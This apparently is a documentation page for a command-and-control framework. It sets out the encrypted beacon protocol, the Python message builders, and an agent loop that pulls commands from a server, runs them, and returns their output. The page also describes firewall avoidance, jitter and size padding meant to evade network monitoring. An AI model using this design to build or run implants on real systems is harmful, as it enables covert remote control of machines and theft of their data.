Skip to main content

Protocol Overview

The C2 protocol uses a binary message format with encrypted payloads. All communication happens over HTTPS through a single /beacon endpoint, with agents initiating all connections to avoid firewall restrictions.

Message Format

Each message is wrapped in a binary envelope with the following structure:
Wire format (7-byte header + body):
    [ magic: 2B | version: 1B | length: 4B | nonce: 12B | ciphertext+tag ]

Struct format '!HBI': big-endian, uint16 + uint8 + uint32.
common/message_format.py
def pack(payload_dict: dict, key: bytes) -> bytes:
    """Serialise, encrypt, and frame a payload dict into a C2 envelope."""
    if not payload_dict or not isinstance(payload_dict, dict):
        raise ProtocolError("pack: payload_dict must be a non-empty dict")

    try:
        plaintext = json.dumps(payload_dict).encode('utf-8')
    except (TypeError, ValueError) as e:
        raise ProtocolError(f"pack: payload not JSON-serialisable: {e}") from e

    # Apply padding before encryption to obscure plaintext length
    profile   = load_active_profile()
    plaintext = pad(plaintext, profile.padding_min, profile.padding_max)

    ciphertext_with_tag, nonce = encrypt(plaintext, key)

    # nonce prepended to body so receiver can split at fixed offset [:12]
    body   = nonce + ciphertext_with_tag
    header = struct.pack(HEADER_FORMAT, MAGIC, PROTOCOL_VERSION, len(body))
    return header + body
Header Fields:
  • magic (2 bytes): Protocol identifier (0xC2C2)
  • version (1 byte): Protocol version (0x01)
  • length (4 bytes): Length of body in bytes
Body Structure:
  • nonce (12 bytes): Random nonce for AES-GCM encryption
  • ciphertext+tag: Encrypted JSON payload with 16-byte authentication tag
The nonce is prepended to the body (not the header) so the receiver can easily extract it at a fixed offset without parsing the header structure.

Message Types

The protocol defines six message types:
common/message_format.py
MSG_CHECKIN       = 'CHECKIN'
MSG_TASK_PULL     = 'TASK_PULL'
MSG_TASK_RESULT   = 'TASK_RESULT'
MSG_TASK_DISPATCH = 'TASK_DISPATCH'
MSG_HEARTBEAT     = 'HEARTBEAT'
MSG_TERMINATE     = 'TERMINATE'

CHECKIN

Direction: Agent → Server
Purpose: Register a new agent session
common/message_format.py
def build_checkin(hostname: str, username: str, os_info: str,
                  agent_ver: str, jitter_pct: int) -> dict:
    """Build a CHECKIN payload dict."""
    msg = _base_payload(MSG_CHECKIN)
    msg['payload'] = {
        'hostname':   hostname,
        'username':   username,
        'os':         os_info,
        'agent_ver':  agent_ver,
        'jitter_pct': jitter_pct,
    }
    return msg
Response: Server assigns a session_id (UUID) and returns it to the agent.

TASK_PULL

Direction: Agent → Server
Purpose: Request next pending command
common/message_format.py
def build_task_pull(session_id: str) -> dict:
    """Build a TASK_PULL payload dict."""
    msg = _base_payload(MSG_TASK_PULL, session_id=session_id)
    msg['payload'] = {'session_id': session_id}
    return msg
Response: Server responds with one of:
  • TASK_DISPATCH if a command is queued
  • TASK_PULL with status: no_task if queue is empty
  • TERMINATE if the session has been deactivated

TASK_DISPATCH

Direction: Server → Agent
Purpose: Send a command for execution
server/server_main.py
resp = mf._base_payload(mf.MSG_TASK_DISPATCH, session_id=session_id)
resp['payload'] = {
    'task_id':   task.task_id,
    'command':   task.command,
    'args':      task.args,
    'timeout_s': task.timeout_s,
}

TASK_RESULT

Direction: Agent → Server
Purpose: Report command execution results
common/message_format.py
def build_task_result(session_id: str, task_id: str, stdout: str,
                      stderr: str, exit_code: int, duration_ms: int) -> dict:
    """Build a TASK_RESULT payload dict."""
    msg = _base_payload(MSG_TASK_RESULT, session_id=session_id)
    msg['payload'] = {
        'task_id':     task_id,
        'stdout':      stdout,
        'stderr':      stderr,
        'exit_code':   exit_code,
        'duration_ms': duration_ms,
    }
    return msg

HEARTBEAT

Direction: Agent → Server (optional)
Purpose: Keep session alive without pulling tasks

TERMINATE

Direction: Server → Agent
Purpose: Instruct agent to shut down gracefully
The TERMINATE signal is sent when an operator deactivates a session. The agent receives it on the next beacon and calls sys.exit(0).

Base Payload Structure

All messages include mandatory fields:
common/message_format.py
def _base_payload(msg_type: str, session_id: str = None) -> dict:
    """Return mandatory fields present in every message."""
    if msg_type not in VALID_MSG_TYPES:
        raise ProtocolError(f"unknown msg_type '{msg_type}'")
    return {
        'msg_type':   msg_type,
        'session_id': session_id,
        'timestamp':  int(time.time()),
        'nonce':      uuid.uuid4().hex,   # replay protection
        'payload':    {},
    }
  • msg_type: One of the six defined message types
  • session_id: UUID assigned during CHECKIN (null for CHECKIN message)
  • timestamp: Unix timestamp when message was created
  • nonce: Random UUID hex string for replay protection
  • payload: Message-specific data

Beacon Loop

The agent’s main execution loop is implemented in the BeaconLoop class:
agent/beacon.py
def _checkin(self) -> None:
    # Send CHECKIN and store the session_id assigned by the server.
    global logger

    payload  = _build_checkin_payload()
    response = _send(payload, self._key)

    self._session_id = (
        response.get('session_id') or
        response.get('payload', {}).get('session_id')
    )

    if not self._session_id:
        raise TransportError(
            'CHECKIN response missing session_id — server may have rejected checkin'
        )

    # Re-create logger with session_id so all subsequent logs are tagged
    logger = update_session(logger, self._session_id)

    logger.info('checkin complete', extra={
        'session_id': self._session_id,
        'hostname':   platform.node(),
    })
Loop Flow:
  1. Sleep with jitter — Agent sleeps for BEACON_INTERVAL_S ± jitter
  2. Send TASK_PULL — Agent requests next command from server
  3. Process response:
    • If TASK_DISPATCH: Execute command and send TASK_RESULT
    • If TERMINATE: Exit cleanly with sys.exit(0)
    • If no task: Continue to next iteration
  4. Error handling:
    • Network errors trigger exponential back-off
    • Unexpected errors are logged but don’t crash the loop

Exponential Back-off

The agent implements retry logic with exponential back-off to handle network failures gracefully:
agent/beacon.py
class BackoffManager:
    # Manages exponential back-off state for retry logic

    _SEQUENCE = [1, 2, 4, 8, 16, 32, 60]  # delay steps in seconds, capped at 60

    def __init__(self):
        self.attempts = 0

    def compute_delay(self) -> float:
        # Return the delay for the current attempt, capped at the last sequence value.
        return float(self._SEQUENCE[min(self.attempts, len(self._SEQUENCE) - 1)])

    def reset(self) -> None:
        # Reset attempt counter after a successful operation.
        self.attempts = 0
Back-off Sequence: 1s → 2s → 4s → 8s → 16s → 32s → 60s (capped)
The back-off counter is reset after any successful beacon, preventing indefinite delays during normal operation.

Replay Protection

Each message includes a unique nonce (UUID) that the server stores and checks:
server/server_main.py
# Step 3 — nonce replay check
if not await db.check_and_store_nonce(nonce):
    logger.warning('replay detected', extra={
        'session_id': session_id,
        'nonce':      nonce,
    })
    return JSONResponse(status_code=409, content={'error': 'replay detected'})
If a nonce is seen twice, the server rejects the message with a 409 Conflict status code.
Why UUIDs for nonces?
UUIDs provide 122 bits of entropy (version 4), making collisions astronomically unlikely even with billions of messages. This eliminates the need for synchronized counters between agent and server.

Padding Strategy

To prevent traffic analysis based on message size, the protocol applies random padding before encryption:
common/message_format.py
# Apply padding before encryption to obscure plaintext length
profile   = load_active_profile()
plaintext = pad(plaintext, profile.padding_min, profile.padding_max)
The padding is stripped after decryption, ensuring the receiver gets the original plaintext.
Padding obscures the true size of commands and results, making it harder for network observers to infer the type of activity occurring.

Build docs developers (and LLMs) love